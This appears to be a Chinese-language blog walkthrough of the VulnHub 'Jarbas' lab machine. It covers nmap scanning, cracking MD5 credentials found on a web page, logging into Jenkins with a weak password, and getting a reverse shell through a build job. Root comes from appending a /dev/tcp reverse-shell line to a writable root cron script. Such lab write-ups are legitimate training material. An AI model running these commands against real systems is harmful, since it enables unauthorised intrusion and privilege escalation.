尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

[Vulhub靶机]JARBAS靶机渗透

[Vulhub靶机]JARBAS靶机渗透
📅 发布时间:2026/6/19 19:33:15

[Vulhub靶机]JARBAS靶机渗透

靶机搭建

下载地址:

https://download.vulnhub.com/jarbas/Jarbas.zip

下载后设置nat模式即可与攻击机同一网段

kali:192.168.88.133

image-20251014142813893

1.信息收集

主机发现

首先对C段进行扫描,发现131这台主机

sudo nmap -sn 192.168.88.0/24

image-20251014143339532

端口扫描

接下来对这台主机的端口进行4次扫描,第一次快速的tcp扫描,第二次常见端口的udp扫描,第三次详细的tcp扫描(针对已经探测出来的端口),第四次启用nmap自带的漏扫进行扫描(也是探测出来的端口)

TCP快速扫描
sudo nmap -sT --min-rate=10000 -p- 192.168.88.131 -oA vulhub/JarBas/nmapports1-p- 扫描全端口
--min-rate=10000 设置最小的扫描速率
UDP扫描
sudo nmap -sU --top-port 20 192.168.88.131 -oA vulhub/JarBas/udp-ports1--top-port 常见20个端口

image-20251014144640368

接下来把TCP端口的信息整合在变量上,下两次扫描命令更好写

image-20251014144952932

TCP详细扫描探测出的端口信息

sudo nmap -sT -sV -sC -O -p21,22,80,3306,8080 192.168.88.131 -oA vulhub/JarBas/details1

image-20251015200158275

使用漏洞脚本扫描

sudo nmap --script=vuln -p21,22,80,3306,8080 192.168.88.131 -oA vulhub/JarBas/vuln1

image-20251016180253666

2.漏洞探测发现

Mysql渗透

查看了一下未授权,无果就直接放弃了

sudo mysql -h 192.168.88.131 -u root -p 

Web渗透

查看后是默认的页面。

image-20251015193420849

使用dirsearch扫一下目录

dirsearch -u 192.168.88.131

查看/access.html

image-20251015193451624

写着凭证以安全的方式进行了加密,尝试使用hash-identifier识别一下这个密文

image-20251015193623120

识别大概率是md5

image-20251015193835334

成功解密,对应密文如下 第一反应是ssh登录,mysql登录,但是都没有成功

tiago:italia99
trindade:marianna
eder:vipsu

image-20251015193847757

接着访问到了8080端口,为一套很常见的cms-Jenkins。那先尝试一下nmap扫的robots.txt以及刚刚找到的这三个用户和弱口令尝试

image-20251016180026543

发现第三个用户eder成功登录

image-20251016180457840

那随机去搜索一下Jenkins的漏洞

创建项目,然后执行shell命令,写入反弹shell,kali开启监听。

image-20251016193604038

点击Build_Now 执行刚刚创建的项目,成功反弹。但是权限很低。很多命令无法执行

jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false

image-20251016193954624

查看定时任务

cat /etc/crontab 

发现每五分钟会以root权限执行如下脚本

image-20251016194839016

查看到有写入的权限,将反弹shell写入sh脚本中 kali开启监听

echo "/bin/bash -i >& /dev/tcp/192.168.88.133/4443 0>&1" >> /etc/script/CleaningScript.sh
nc -lvvp 4443

image-20251016195242479

成功拿到root权限

image-20251016195611030

相关新闻

  • 最小二乘问题详解5:非线性最小二乘求解实例
  • 神经网络入门研读报告
  • 搜维尔科技:具有人手级别抓握和操纵能力的灵巧手

最新新闻

  • 合肥想养猫狗先看看,萌宠宠园探店记录 - 园友3800037
  • 厦门二手奢侈品回收怎么避坑?高净值客户必须看的三个参数 - 奢品小当家
  • 2026昆山地下室防水市场专业解析与四家服务商适配推荐 专业防水公司排名推荐(2026年6月防水补漏最新TOP权威排名) - 鼎壹万修缮说
  • FitGirl Repack Launcher:你的游戏下载管家,让找游戏变得简单有趣
  • 01人月神话阅读笔记
  • 民国老文书老照片别丢!北京记录者商行上门回收民国照片、任命书、毕业证书 - 深鉴新闻

日新闻

  • 5分钟掌握Python进化算法:Geatpy高性能优化工具完全指南
  • Microchip 24AA044 EEPROM选型与应用全指南:从参数解析到实战编程
  • 华为的鸿蒙到底有多牛?为什么称作遥遥领先?

周新闻

  • 3步解锁iOS设备:applera1n激活锁绕过完全指南
  • 39 2026 人工智能证书终极盘点,普通人选 AI 证书可以从这些方向入手
  • Redis 暴露公网有多危险?从端口检查到补救步骤

月新闻

  • 【总结】入门篇:50句话让你记住架构核心概念
  • WeChatMsg技术方案解析:实现Mac微信数据自主管理的完整解决方案
  • WeChatMsg:革新性微信数据备份方案,打造你的专属数字记忆库

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号